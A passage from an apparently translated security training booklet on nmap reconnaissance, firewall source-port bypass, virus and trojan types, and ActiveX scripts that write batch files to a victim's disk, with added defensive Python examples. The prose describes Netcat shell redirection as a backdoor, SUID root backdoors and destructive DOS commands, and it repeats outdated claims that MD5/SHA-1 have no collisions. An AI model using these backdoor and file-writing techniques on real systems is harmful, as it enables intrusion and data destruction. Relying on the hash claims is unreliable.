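    """Turn the port table into a list of dicts, one per port line."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue   # header, blank lines and nmap chatter
        records.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": m.group("service"),
            "version": m.group("version") or "",
        })
    return records


def exposed_internal_services(records: List[Dict], policy=INTERNAL_ONLY) -> List[Dict]:
    """Open ports whose service is on the internal-only list."""
    return [r for r in records if r["state"] == "open" and r["service"] in policy]


def version_inventory(records: List[Dict]) -> Dict[str, str]:
    """'port/proto' -> version string, the starting point for patch tracking."""
    return {f"{r['port']}/{r['proto']}": r["version"] for r in records}


if __name__ == "__main__":
    recs = parse_services(SAMPLE)
    for r in exposed_internal_services(recs):
        print(f"{r['port']}/{r['proto']} {r['service']} should not be reachable from outside")
    print(version_inventory(recs))
```

On the sample host, seven of the eleven open ports (portmapper, Samba, the NIS daemons, mountd, status and NFS) fall under the policy, which is the kind of result that should lead straight to the firewalling advice in the Security section.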
H) Listing of firewalling rules

Errors in implemented filtering rules can result in an intruder establishing contact in a trivial way with Internet systems.

Filtering by trust relation: The majority of filtering rules are implemented according to authorisations given to certain specific machines. You can try to determine the trusted IP addresses, if these do exist, by using idle host scanning techniques we will study later on in this training course.
Filtering by protocol: Some protocols are not forbidden, such as ICMP, UDP ... They can represent a danger because they can encapsulate communications with backdoors installed by the hacker. These techniques are designated by the term covert channel. You can determine which protocols are authorised thanks to nmap's -sO option:
# nmap 3.50 scan initiated Wed May 5 09:53:23 2004 as: nmap -sO -v 192.168.124.20
Interesting protocols on (domain.com):
PROTOCOL STATE SERVICE
0 open hopopt
1 open icmp
2 open igmp
3 open ggp
4 open ip
5 open st
6 open tcp
7 open cbt
8 open egp
9 open igp
10 open bbn-rcc-mon
11 open nvp-ii
12 open pup
13 open argus
14 open emcon
15 open xnet
16 open chaos
17 open udp
18 open mux
19 open dcn-meas
20 open hmp
21 open prm
22 open xns-idp
...
Filtering by source port

Frequently, filtering rules based on source ports are found, in order to let internal machines establish communications on the Internet. For example, to let users surf the web, answers coming from port 80 must be accepted. That is also the case for incoming DNS answers. So the ports often authorised as source are 25/tcp, 53/udp, 80/tcp, 110/tcp. It is then possible for a hacker to bypass the access restrictions by establishing connections from the authorised source ports. You can use the -g option associated with a source port and a protocol (TCP by default, -sU for UDP) in order to determine the firewalling rules according to source ports.
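The weakness just described is a property of stateless rules: a rule that says “accept inbound packets whose source port is 80” cannot tell a reply to one of our own web sessions from a fresh connection that merely chose 80 as its source port. The fix is to accept inbound traffic only as the reply to a connection the firewall saw leave. The following Python is an added example, not part of the booklet: it puts the weak rule beside a connection-tracking rule and evaluates both on constructed packets (one genuine reply, one connection to NetBIOS from source port 80, and the same pair for UDP/53); the addresses and the tiny connection table are assumptions of the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str   # "tcp" or "udp"
    flags: str   # TCP flag letters; "" for UDP


# Weak rule set from the text: accept anything whose source port is a service we use.
ALLOWED_SOURCE_PORTS = {25, 53, 80, 110}


def stateless_allow(pkt: Packet) -> bool:
    """Source-port rule: looks only at the packet in hand."""
    return pkt.proto in {"tcp", "udp"} and pkt.sport in ALLOWED_SOURCE_PORTS


# Corrected design: a connection table holds the flows that left the network,
# keyed as (inside host, inside port, outside host, outside port, proto).
Flow = Tuple[str, int, str, int, str]


def stateful_allow(pkt: Packet, conntrack: Set[Flow]) -> bool:
    """Accept an inbound packet only if it answers a flow we initiated.
    A bare SYN from outside is a new connection and is refused whatever its
    source port; for UDP the table lookup alone decides."""
    if pkt.proto == "tcp" and "S" in pkt.flags and "A" not in pkt.flags:
        return False
    return (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto) in conntrack


# Constructed traffic for the example (203.0.113.0/24 is a documentation range).
CONNTRACK: Set[Flow] = {
    ("192.168.0.10", 49152, "203.0.113.5", 80, "tcp"),   # a user's browser session
    ("192.168.0.10", 40000, "203.0.113.53", 53, "udp"),  # a DNS query just sent
}
PACKETS: List[Packet] = [
    Packet("203.0.113.5", 80, "192.168.0.10", 49152, "tcp", "SA"),  # genuine HTTP reply
    Packet("203.0.113.5", 80, "192.168.0.10", 139, "tcp", "S"),     # SYN to NetBIOS from sport 80
    Packet("203.0.113.53", 53, "192.168.0.10", 40000, "udp", ""),   # genuine DNS answer
    Packet("203.0.113.53", 53, "192.168.0.10", 2049, "udp", ""),    # UDP to NFS from sport 53
]


def evaluate(packets: List[Packet] = PACKETS, conntrack: Set[Flow] = CONNTRACK) -> Dict[str, List[bool]]:
    """Verdict of each rule set for every packet, in input order."""
    return {
        "stateless": [stateless_allow(p) for p in packets],
        "stateful": [stateful_allow(p, conntrack) for p in packets],
    }


if __name__ == "__main__":
    for name, verdicts in evaluate().items():
        print(name, verdicts)
```

The stateless rule accepts all four packets; the stateful one accepts only the two real replies. This is the reasoning behind the recommendation later in the Security section that internal services, file sharing in particular, must not be reachable from the Internet: a source-port rule cannot enforce that on its own.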
Here is a summary of all the functions that can be given to nmap:

-sS              SYN scanning
-sT              Connect() method
-sF, -sX, -sN    FIN scan, Xmas scan, NULL scan...
-sP              Ping scanning
-sU              Scanning in UDP mode
-sO              Scanning of authorised protocols
-sA              ACK scan
-sW              Window scanning
-sR              RPC scan
-P0              De-activate the ping before the port scan
-O               Active fingerprinting
-A               Application fingerprinting
-v               Verbose mode
-oN file         Write the output to the specified file
-p port          Specification of particular ports or of a port range to scan
-F               Scan of ports listed in the services file
-g port          Use the specified port as communication source port
Security

Since most of the information gathered is either public or linked to the functioning of the infrastructure or to accessible services, it is essential to establish a real security management policy concerning published or accessible information.
Give as little information as possible concerning your IT infrastructure, and check that no sensitive information is accessible via web-type access (especially in source code...). Each user must also be careful about any information he or she could leak, especially on forums, in newsgroups or in interviews.
De-activate services that are not useful, as each service represents an extra danger.
Correctly implement your firewalling rules, so that internal services, especially of the filesharing type, are not accessible from the Internet.
Filter the ICMP protocol, as it can give precious technical information to a possible intruder.
Modify the banners of all services, replacing them with banners of other equivalent services in order to mislead the hacker's results.
As much as possible, make sure you do not allow free access to Netbios file-sharing services from the Internet.
CHAPTER II CLIENT VULNERABILITIES
1. Virus attack

Even with massive anti-virus protection, no one is ever immune to an attack from a recent or unreferenced virus. The best course of action is to be wary of the following symptoms. These are not necessarily caused by a virus, but that is frequently the case. A deeper examination will then be necessary, and it is recommended you go to the next chapter, which concerns viruses:
1. The antivirus protection of the BIOS informs you of an access to the boot zone of the hard drive.
2. When you start your computer, a message tells you it cannot start from the hard drive.
3. Windows refuses to load the 32-bit hard drive drivers.
4. When Windows is started, a message informs you that a TSR program is forcing it to start in MS-DOS compatible mode.
5. ScanDisk detects cross-linked files or other problems.
6. ScanDisk indicates defective sectors on the hard drives or floppy disks.
7. The size of executable files suddenly increases.
8. The creation or modification dates of files are wrong.
9. You notice the computer frequently stalls even though you have added no new software or hardware component.
10. The computer stalls and indicates a parity error.
11. The computer seems to be slower for no apparent reason.
12. The keyboard and mouse are no longer reliable, even after having been cleaned.
13. Files disappear from your computer in an unexplained manner.
14. In your documents, some words disappear while others are suddenly added.

Let us now see the modes of action of the most dangerous viruses according to their type. You will recognise some of the names used (polymorphic viruses, macro-viruses ...) and you will also realise there are many more. The following paragraphs list all types of viruses.

Boot sector viruses: These viruses settle in the boot sector of boot floppy disks and hard drives. Only a few years ago, these were the most common variety. Back then, they would spread rapidly because users often exchanged data with floppy disks.
Now that the size of applications and of files has considerably increased, media such as CD-ROMs are much more widely used. Meanwhile, other contamination means such as the Internet have been developed, and at the same time boot sector viruses have lost ground. All danger has not disappeared, however. Viruses of this type almost exclusively use floppy disks as a dissemination medium: all that has to be done is to insert a boot floppy disk into an infected PC's drive to contaminate it; the disk then transmits the virus to each computer using it to boot. When you forget such a medium in the drive, the computer uses it to boot the next time instead of favouring the hard drive. The virus is then immediately transmitted to the disk. They cannot be disseminated on networks. Boot sector viruses are resident parasites, meaning that they settle in live memory at start-up and wait for an opportunity to spread.

Partition sector viruses: Partition sector viruses are a development of boot sector viruses. They can bypass an obstacle that the latter encounter: the structure of the boot sector depends on the operating system. There are differences between the various versions of DOS and Windows. A boot sector virus that wants to disseminate widely must distinguish these structures and adapt to them. The resulting code is large, whereas the boot sector only offers limited space. Partition sector viruses do not have to deal with this problem, as the structure of the sector they settle into does not depend on the operating system. The infection is disseminated almost exclusively through floppy disks. So the previous remarks concerning boot sector viruses also apply here: a disk forgotten in the drive is often the cause of the infection. Partition sector viruses, like boot sector ones, are resident parasites, meaning that they settle in live memory during booting and wait for an opportunity to spread.
File viruses: These viruses attack .com and .exe executable files, and more rarely .dll and .ovl files. A program virus attaches itself to a program file (the host) and uses various techniques to infect other program files. There are three basic techniques for infecting an executable file: replacement, adding at the start and adding a "return" (jump).
➢ A virus based on replacement writes itself over the start of the original program code, thus damaging the program. When you try to run it, nothing happens, but the virus infects another file. Such viruses are easily noticed by users and technical staff, so they do not spread widely. There is very little risk that a virus of this type finds its way onto your machine.
➢ A virus based on adding at the start puts its entire code at the very beginning of the original program. When you run a program infected in this way, the virus code runs first and then the original program; the size of the infected file of course increases.
➢ A virus based on adding a "return" places a jump at the start of the program code, moves the original start of the code to the end of the file and inserts itself between what was the end of the file and that relocated start. When you run the program, the jump calls the virus, which runs, restores the original start of the file to its normal position and then lets the program start. An increase in file size is nonetheless noticeable.
We have just seen briefly how a virus attaches itself to a program file. It uses various infection techniques. Most viruses are resident, meaning that they can monitor all actions and infect other programs. Other file viruses infect by "direct action", which means that they infect a program when they gain access to it. There are many other methods, but in most cases they place the virus in memory. If the virus is resident, it is extremely easy for it to infect other programs, simply by waiting for them to be run and entering them. The file is then infected (it becomes a "carrier") and goes on to infect other programs. Once activated, they can contaminate other executables and spread. Like the executable files on your hard drive, these viruses can be found on floppy disks, CD-ROMs, attached to email or in downloaded files. All of these are possible means of infection. Unlike boot or partition sector viruses, this type of virus is not systematically activated each time the computer is turned on; it loads into memory only when the user opens an infected file. However, they spread even when inactive, as all it takes is for a contaminated program to be transmitted by email or any other medium: if the recipient runs the software without first submitting it to an anti-virus, their PC is contaminated. What's more, they can infect networks.
File system viruses: These viruses are thankfully very rare, which is a good thing as they are hard to eliminate. They exploit the way the medium is managed: a system file records the physical address of the first allocation unit of every file on the medium, and when the user opens a file the computer looks up the corresponding address in this file. These viruses replace that address with their own and keep their own directory up to date. When a file manipulated in this way is called, the virus activates itself first; it then uses its list to call the requested file and so hides its presence.
Companions: Companion viruses are a group of viruses of no great importance. They were widespread in the days of MS-DOS; Windows is a less favourable ground for them, and they have become rarer. The functioning of companions is based on a specificity of the DOS operating system: when an executable file is called, it is not necessary to give the extension (.exe, .com, .bat); the name of the file is enough. DOS first looks for .com files, then .exe files and finally .bat files. The virus takes advantage of this by creating a .com file bearing the name of the .exe file and containing its own code. Programmers of these viruses want to infect as many files as possible so that their companions are activated quickly.
Direct Action: The viruses presented so far share the characteristic of functioning as residents: when they are activated (by accessing a medium or opening an infected program), they load into memory. They are then active until the PC is turned off and infect as many programs and media as possible. Thankfully, their activity is quickly noticeable: simply by checking the contents of memory, one can notice the presence of suspicious software. Direct Action viruses are quite another type altogether: they try to infect the maximum number of files in a relatively short time so as to go unnoticed, then stop without leaving any trace in memory. Direct Action parasites are file viruses, meaning that they are linked to executables. Their means of infection are floppy disks and CD-ROMs, email, file transfer and downloads from the Internet. Of course, copying the file onto your hard drive does not activate the virus; it springs into action only when the program is executed.
Stealth viruses: Stealth viruses are not a specific category of parasite. They are called stealth viruses because they can foil the action of anti-virus software.
Any type of virus can be a stealth virus; however, the camouflage technique is reserved to resident viruses and so does not apply to Direct Action viruses, for example. Stealth viruses hook the operating system functions used to look for viruses. They can thus immediately detect any anti-virus activity and react accordingly, for example by providing false information or by withdrawing from the examined area in time to avoid discovery. Example: a boot sector virus watches the system's access to the functions used for protection; when an application calls them, the virus takes over and supplies a copy of the original boot area. The protection software reads this copy and decides it is correct and virus-free.
Multi-part viruses: These viruses infect both executable files and boot sectors. They can spread over networks.
Polymorphic viruses: Encoding is another protection used by various types of virus. A parasite is characterised by its binary code, a sequence of bytes that is unique to it and that no other program has. This sequence is called a signature and enables the anti-virus to find the virus: the detector looks for signatures in all the programs on the hard drive, and when one is found in a file it deduces that the corresponding virus has already struck. Polymorphic viruses try to avoid this trap by modifying their own code with each new infection, more specifically by changing the sequence of bytes, so that the anti-virus software cannot recognise them. Anti-viruses have adapted to this and are often able to detect polymorphic viruses, which is why it is extremely important to use recent anti-virus programs.
Tunnel viruses and retroviruses: Some viruses do not simply remain passive in the face of anti-viruses: like other viruses, they use camouflage or encoding techniques, but they also act against detectors or try to bypass their supervision.
Some programmers have closely examined the way anti-virus software works and have developed tunnel viruses in response. These parasites try above all to neutralise resident virus detectors by bypassing their supervision: they look for other functions and paths so as to avoid the monitors. Their active lifetime is limited, because anti-viruses constantly adapt to their tricks and have fewer and fewer weak points.
Retroviruses are a bit more aggressive. Other programmers have also closely examined anti-virus software, and the viruses they have created destroy or damage important anti-virus files. The supervision programs in memory are "shot down", and modifications to the configuration files prevent them from starting at the next boot. Retroviruses are remarkably effective: many anti-viruses are insufficiently protected.
Macro viruses: Macro viruses are a new type of virus that first appeared in 1995. Unlike other nuisances, they are not made up of binary code but of macro-language instructions, such as Microsoft Office's VBA or Lotus SmartSuite scripts. These languages are intended for people with limited IT knowledge, hence the flood of macro viruses. As the infection mode is different, users did not immediately realise the extent of the danger, and the viruses took advantage of this to develop at an impressive speed. Thankfully, anti-virus software publishers took care of the matter; however, macro viruses remain a real danger.
Ever since the first macro virus appeared in August 1995, this category has been the fastest-growing. By August 1998, 3400 viruses of this type had been identified, and their number is soaring at a dizzying speed. Companies and individuals have to protect themselves by frequently updating their virus control tools, which means that the anti-virus industry must constantly update its databases and files. A definition file contains virus signatures (the fingerprints of known viruses); it is used by the search engine to detect and eliminate viruses. A virus scan is effective only with a signature file covering recent viruses, so retrieving frequent updates is essential to the security of your IT environment. The differences between macro viruses and more traditional viruses lie in the hosts (data files) and in the replication methods (use of the macro programming language specific to an application). These differences are a new threat to the security of data. Add to this the increasing use of OLE (Object Linking and Embedding), as well as the use of networks, email and the Internet as exchange media, and the sinister picture is complete! Traditional file viruses do not attempt to infect data files, as these are not ideal for dissemination: one does not "open" a data file, one "reads" or "modifies" it. However, over the past few years, companies have built open systems in which information is exchanged more easily; security must therefore be at a minimum. Macro viruses take advantage of the fact that many applications now have a macro programming language. These languages give users (and virus creators) greater flexibility and a power unmatched to this day. Often, macro viruses are not detected early enough because users are not familiar with macros. The result is a higher rate of infection than with traditional file and boot viruses.
The most popular macro programming language at present is WordBasic, integrated into Microsoft Word. As data is exchanged more often than the programs themselves, the security problem created by macro viruses is a very real one. The open systems integrated into many applications use OLE to combine different types of data. You can embed an object such as a picture in a Word document, which means that each modification of the object is reflected in all its copies. You can also link an object such as an Excel spreadsheet into a Word document. This link means that you can modify the object either in the application that was used to create it or in the application to which it is linked, and all its copies will be updated.
Microsoft Word can embed and link objects, and Word documents can themselves be embedded in and linked to other applications. The risk lies in the possibility of sending a macro virus from another application. For example, Microsoft MSMail messages can contain attached files such as Word documents; if the file association is correct, all the MSMail user has to do is double-click on the Word document, Word starts and the document is opened. This is an example of OLE in action. There are other ways of using OLE with Word documents, and it is the frequency of use that increases the security risk posed by Word macro viruses. Some macro viruses contain destructive code; they can even create and execute traditional boot sector and file viruses and affect the functioning of a machine, for example the quality and reliability of the information in a data file. It only took a short time after the first Word macro virus appeared for its Excel equivalent, XM/Laroux.A, to appear. This was expected, as the creation techniques are the same as for programming a Word macro virus. The difference between Word and Excel viruses is that Word viruses are written in WordBasic, whereas Excel viruses are written in VBA3 (Visual Basic for Applications version 3). The format is different, and the macros are not stored inside the spreadsheet (Word viruses are stored in the Word document) but in separate streams. This technique complicates detection, identification and eradication. Excel macro viruses are a tougher problem than Word ones because of their practical consequences. Imagine that an Excel virus multiplies the content of a cell by 10 and that this cell represents your salary! That would certainly not be the end of the world... However, what if the content of the cell were divided by 10?
These are minor inconveniences compared with modifications to the result of a cell whose purpose is to calculate the strength of the concrete used to build a high-rise building. Spreadsheets can be huge and any anomaly hard to detect. The introduction of Office 97 brought modifications to almost all the programs that followed, and the changes were widespread. Excel and Word use VBA5, which is based on VBA3 with numerous extensions. VBA5 is not compatible with WordBasic, which seems to indicate that macro viruses written for previous versions of Word would have no effect on Word 8.0 in Office 97. However, Microsoft has integrated a WordBasic to VBA5 converter and a VBA3 to VBA5 converter to update existing macros to the new formats. Consequently, macro viruses written for previous versions of Word and Excel can also be "updated". Not all viruses will work after conversion, but we do know that some of them will. It is expected that macro viruses will still pose a serious threat to data security, even if it is thought that their number will increase less rapidly. It is also thought that viruses will take advantage of the most common macro programming languages and become independent of applications (do not forget that Microsoft Word is currently the application most affected by macro viruses, most of them written in WordBasic). Furthermore, it is thought that viruses will become polymorphic and stealthy. Anti-virus companies will therefore keep fighting macro viruses, as well as "traditional" file and boot sector viruses, by detecting and eradicating macro viruses both at the application level and at the binary level.
ANSI viruses: Many PCs load a keyboard driver called Ansi.sys at start-up. This driver can change the keyboard configuration, assigning a character or a combination of characters to a key according to the user's language.
Unfortunately, software with suspicious aims takes advantage of this possibility. It can, for example, assign the expression del *.* Enter to any key, so that the user erases the entire contents of a directory by pressing that key in DOS. Viruses, but also more conventional programs, are capable of this. As PCs running Windows 9x no longer need this driver, the danger is avoided.
However, do check the computer's start-up files to see what the situation is, and remove the call to this driver if it exists.
Logic bombs: Some programs that lack the ability to reproduce can still cause serious damage. Software officially presented as a game can include a destructive function triggered by a specific event or on a pre-determined date. Sometimes it is only an innocent prank; however, some programmers are real sadists, even if this is rare.
Trojan horses: Trojan horses are a sub-category of logic bombs. They do not have an immediate destructive aim: their task is limited to espionage. They gather confidential information on the user of the PC they have entered and transmit it to their creator. The mission of some Trojan horses is to establish an access (for example through a network) to the infected computer. As the Internet is increasingly used for commercial transactions, many new Trojan horses have been put into circulation.
2. Trojans
There are different sorts of hidden gateways (backdoors). The best known remains the trojan. A trojan is software executed without the user's knowledge. It listens on a port of the system and waits for a suitable client. Quite often a trojan kit is made up of client software, which is harmless for the user running it, and an executable server. Many trojans are available on the Internet. As the majority are referenced by anti-viruses and designed for Windows, a hacker attacking a Linux machine, or wishing to use more discreet software, will have to find alternative solutions.
(Figure: Netbus control window)
Netcat
Netcat (http://www.atstake.com/research/tools/network_utilities) is a piece of software used to carry out network diagnostics. It is a very popular tool in the Unix world: it can rapidly open TCP/UDP connections as well as listen on ports. Netcat is available for both Linux and Windows, and it is not a hacking tool. However, it includes a function that is very useful to users who know about it: it can redirect the traffic received on a port to a local application. So by having Netcat listen on a port, any command received can be redirected to /bin/bash or cmd.exe. As Netcat is not a hacking tool, it is not detected by anti-viruses. A hacker with minimal programming skills will have no trouble developing, in a very short time, software offering the same redirection functions as Netcat.
Still concerning Linux systems, it should be noted that it is trivial to create a small program offering unlimited administrator privileges, should a hacker obtain them even once: once in possession of total power, the hacker would hide the program with the SUID bit set, thus sharing root privileges with anyone later executing it.
Creating a hidden gateway:
But the ultimate technique is to infect existing binaries on the hard drive, or even in memory. On Windows, an anti-virus such as Norton AntiVirus (http://www.symantec.com) does not notice the infection mechanisms if the malicious program's code is not recognised in its signature base. Likewise, if for example Internet Explorer is infected and re-programmed to connect to a remote system, there is no chance your firewall will warn you: Internet Explorer is an application that firewall users very often authorise. With the necessary rights, a skilful hacker will also be able to place a backdoor at the level of the system's kernel, and more generally on the system as a whole. This is called a rootkit. This method is currently more advanced on Linux, even if it is also found on Windows. At this stage of a takeover, you can no longer truthfully believe any active security software on the system. Not one.
How can a hacker install a backdoor? If the target machine is a server, the hacker will probably be able to reach the system's resources through poorly protected accesses: vulnerable server applications, compromised passwords... At that point you will not be able to prevent him from executing code, at least within the limits of his execution rights. If the machine is a workstation, the hacker can include the user as a vulnerability factor: all it takes is to visit a malicious web page while the browser is very tolerant about script execution, or while a vulnerable version of Outlook is in use. He can also try to have the program executed through manipulation, incitement or deception (a fake email from a colleague, for example).
Detection methods
Against the most common basic trojans, an anti-virus should spare you a few headaches. As we have seen, however, most anti-viruses cannot counter more elaborate strategies, especially if the hacker has a "legitimate" piece of software listen on a port (any port). Most firewalls will be able to limit the improper use of outgoing connections or the establishment of server applications. But once again this is not enough, and it is necessary to regularly check the process activity on the system. As a user, you should normally be able to justify the presence of every application visible in the Task Manager on Windows, or having an entry in /proc on Linux (read with ps or top). Some more capable analysis tools, such as those presented in the Windows monitoring section, can be of precious help during the detection phase. Otherwise, the netstat tool, on Linux and Windows, indicates the state of active or listening sockets. A hacker with a network connection could not hide from this tool without having first obtained administrator privileges.
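One way to act on the netstat advice above, as an added example that is not part of the booklet: a small Python parser for lines in the layout of netstat -ano on Windows that lists listening sockets and flags those whose port the administrator cannot account for. The sample output and the baseline of known ports are constructed, not captured from a real host.

```python
"""Flag listening sockets that are not on an expected baseline.

Added example (not code from the Hackademy booklet): the booklet says
netstat on Windows or Linux shows the state of active or listening
sockets; this parses lines in the layout of ``netstat -ano`` (Windows)
and reports listeners the administrator has not accounted for.
"""
from typing import Dict, List, NamedTuple

# Constructed sample in the layout of `netstat -ano` on Windows
# (column order as printed by the real command; every value is invented).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       2316
  TCP    192.168.1.10:1038      192.168.1.1:80         ESTABLISHED     1580
  TCP    127.0.0.1:31337        0.0.0.0:0              LISTENING       2316
  UDP    0.0.0.0:500            *:*                                    1204
  UDP    0.0.0.0:4444           *:*                                    2316
"""


class Socket(NamedTuple):
    proto: str
    local_addr: str
    port: int
    state: str   # "LISTENING", "ESTABLISHED", ...; empty for UDP rows
    pid: int


def parse_netstat(output: str) -> List[Socket]:
    """Parse netstat -ano style lines into Socket records, skipping headers."""
    sockets = []
    for line in output.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue  # banner, blank line or column header
        proto, local = fields[0], fields[1]
        addr, _, port = local.rpartition(":")  # also copes with "[::]:135"
        if proto == "TCP" and len(fields) == 5:
            state, pid = fields[3], fields[4]
        elif proto == "UDP" and len(fields) == 4:
            state, pid = "", fields[3]  # UDP rows have no State column
        else:
            continue  # malformed row: ignore rather than guess
        sockets.append(Socket(proto, addr, int(port), state, int(pid)))
    return sockets


def listeners(sockets: List[Socket]) -> List[Socket]:
    """TCP sockets in LISTENING state plus every bound UDP socket."""
    return [s for s in sockets if s.proto == "UDP" or s.state == "LISTENING"]


def unexpected_listeners(output: str, baseline: Dict[str, set]) -> List[Socket]:
    """Listeners whose (proto, port) the administrator has not justified.

    baseline maps "TCP"/"UDP" to the set of ports known to belong to
    legitimate services; anything else deserves a look in Task Manager.
    """
    return [s for s in listeners(parse_netstat(output))
            if s.port not in baseline.get(s.proto, set())]


# Constructed baseline for the sample host: RPC (135), SMB (445), IKE (500).
KNOWN_PORTS = {"TCP": {135, 445}, "UDP": {500}}


def suspicious_pids(output: str, baseline: Dict[str, set] = KNOWN_PORTS) -> List[int]:
    """PIDs owning at least one unexplained listener, for follow-up."""
    return sorted({s.pid for s in unexpected_listeners(output, baseline)})


if __name__ == "__main__":
    for s in unexpected_listeners(SAMPLE_NETSTAT, KNOWN_PORTS):
        print(f"unexpected {s.proto} listener on port {s.port} (PID {s.pid})")
    print("PIDs to check in Task Manager:", suspicious_pids(SAMPLE_NETSTAT))
```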
Against hacker software that is not listed, there remains heuristic analysis. This consists in analysing the program's code and its execution behaviour in order to find any suspicious routines. Anti-viruses such as AVP (http://www.kaspersky.com) or AVG (http://www.grisoft.com) are effective, but not infallible, and they sometimes trigger on false positives. Some rootkits, especially on Linux, have their own dedicated anti-rootkit tools: CHKRootkit (http://www.chkrootkit.org) can detect about fifty popular rootkits. Generally speaking, your best ally against file infection remains the file integrity checker. Properly used, the security it offers is infallible. It consists in associating with each of the system's sensitive files a digital signature of the MD5 or SHA-1 type. MD5 and SHA-1 are algorithms that compute, for a given sequence of bytes, a signature of 16 or 20 bytes respectively. If only one byte of a file is modified, the whole signature changes! As of today, there are no officially known "collisions" for these algorithms, meaning different byte sequences producing the same signature. Once a list of signatures has been produced on a system recognised as clean, it can be saved on an external medium (for example a CD-ROM). In case of doubt, a simple check against the CD will enable you to pinpoint and replace the corrupted applications. For Linux, the dedicated solution is called TripWire (http://www.tripwire.org).
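The integrity-control method described above, as an added example that is not the booklet's or TripWire's code: it builds a baseline of file digests with Python's hashlib, stores it as JSON (standing in for the CD-ROM copy), then reports modified, missing and added files after a single byte has been changed. The algorithm is a parameter; SHA-256 is the default here because MD5 and SHA-1, the two algorithms the booklet names, have had collisions published since it was written. File names and contents are constructed.

```python
"""File integrity baseline and check, in the spirit of the booklet's
'file integrity controller': one digest per sensitive file, baseline kept
off-host, later comparison reveals any modified, missing or added file.

Added example, not the booklet's or TripWire's code. The digest algorithm
is a parameter: MD5 gives 16 bytes and SHA-1 20 bytes, as the booklet
says, but both now have public collisions, so SHA-256 is the default.
"""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def file_digest(path: Path, algorithm: str = "sha256") -> str:
    """Hex digest of a file, read in chunks so large binaries fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, algorithm: str = "sha256") -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its digest."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            baseline[p.relative_to(root).as_posix()] = file_digest(p, algorithm)
    return baseline


def save_baseline(baseline: Dict[str, str], dest: Path, algorithm: str = "sha256") -> None:
    """Write the baseline as JSON; in practice dest lives on read-only media."""
    dest.write_text(json.dumps({"algorithm": algorithm, "files": baseline}, indent=1))


def check_against(root: Path, baseline_file: Path) -> Dict[str, List[str]]:
    """Compare the current tree with a saved baseline.

    Returns relative paths in three buckets: 'modified' (digest differs),
    'missing' (in baseline, gone from disk) and 'added' (on disk, not in
    baseline). A binary an attacker overwrote shows up under 'modified'.
    """
    saved = json.loads(baseline_file.read_text())
    old = saved["files"]
    current = build_baseline(root, saved["algorithm"])
    return {
        "modified": sorted(p for p in old if p in current and current[p] != old[p]),
        "missing": sorted(p for p in old if p not in current),
        "added": sorted(p for p in current if p not in old),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a small tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "system"
        (root / "bin").mkdir(parents=True)
        (root / "bin" / "netstat.exe").write_bytes(b"MZ original netstat\x00")
        (root / "bin" / "ping.exe").write_bytes(b"MZ original ping\x00")
        (root / "config.sys").write_bytes(b"DEVICE=HIMEM.SYS\r\n")
        store = Path(tmp) / "baseline.json"  # stands in for the CD-ROM copy
        save_baseline(build_baseline(root), store)

        # Tamper: flip ONE byte of netstat.exe, delete config.sys, drop in a new file.
        data = bytearray((root / "bin" / "netstat.exe").read_bytes())
        data[3] ^= 0x01
        (root / "bin" / "netstat.exe").write_bytes(bytes(data))
        (root / "config.sys").unlink()
        (root / "bin" / "svchost32.exe").write_bytes(b"MZ not in baseline\x00")
        return check_against(root, store)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```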
3. ActiveX
A) VBScript
The aim of this part of the course is to show how a hacker could use malicious scripts through Internet Explorer. In our first example, we are going to create an HTML page whose aim is to create a batch file on the victim's computer. A batch file is a succession of MS-DOS commands executed one after the other. Here is the basic structure of an HTML file you will have to type in (without the comments) to create a blank page titled "My Internet page".
My Internet page
Between <!-- and --> tags are the comments, which do not appear in your browser but only in the page source. On the Internet, one can find many scripts that take advantage of various weak points to read, write and modify files on a client's disk. These scripts are often called ActiveX. ActiveX controls were developed by Microsoft to increase the interaction between a website and a client's browser. ActiveX are coded in VBScript. The ActiveX below enables a batch file to be written on the victim's disk. It has to be included in an HTML page between the and tags.
It will create a batch file at the root of C: called "newfile.bat". This batch file will contain one MS-DOS command line ("echo CrashFr"). To add further commands, simply add another "BatFile.WriteLine" line followed by the MS-DOS command. Here are several ActiveX that the hacker could combine with the above example:
Writing a key in the registry
Deleting a key in the registry
Creating a URL shortcut in the Start menu
To correctly create your .bat file, you need to know the main DOS commands:
DOS commands
cd ..                           goes up to the parent directory
cd [directory]                  goes to a sub-directory
choice                          prompts the user to make a choice
cls                             clears the screen
copy [file] [directory]         copies a file into a directory
del [file]                      deletes a file
dir /p                          displays the contents of a directory one screen at a time
dir                             displays the contents of a directory
@echo off                       does not display the following commands
echo.                           prints a blank line
echo [text]                     displays the following text
edit [file]                     displays the text file and allows it to be edited
erase [file path]               deletes a file (no confirmation asked)
format [drive]                  formats a disk (asks the victim for confirmation)
goto [label]                    jump to a label
if                              conditional branch
mem                             displays memory usage
mkdir [directory]               creates a directory
pause                           waits for the user to press any key before continuing
ren [file1] *.[new extension]   replaces the extension of file1 with the new extension
rename [file1] [new name]       renames file1 with a new name
rmdir [directory]               deletes a directory
type [text file]                displays the contents of a text file
ver                             displays the DOS version
vol [drive]                     displays the volume label of a drive
c:\windows\*.*                  wildcard covering the whole contents of a directory (confirmation asked)
c:\windows\*.[extension]        wildcard covering all files of a given type in the directory (no confirmation asked)
For further help on MS-DOS commands, open a command prompt and enter the command followed by "/?":
c:\windows\command>ping /?
Here is an example of an HTML page combining the various examples seen above:
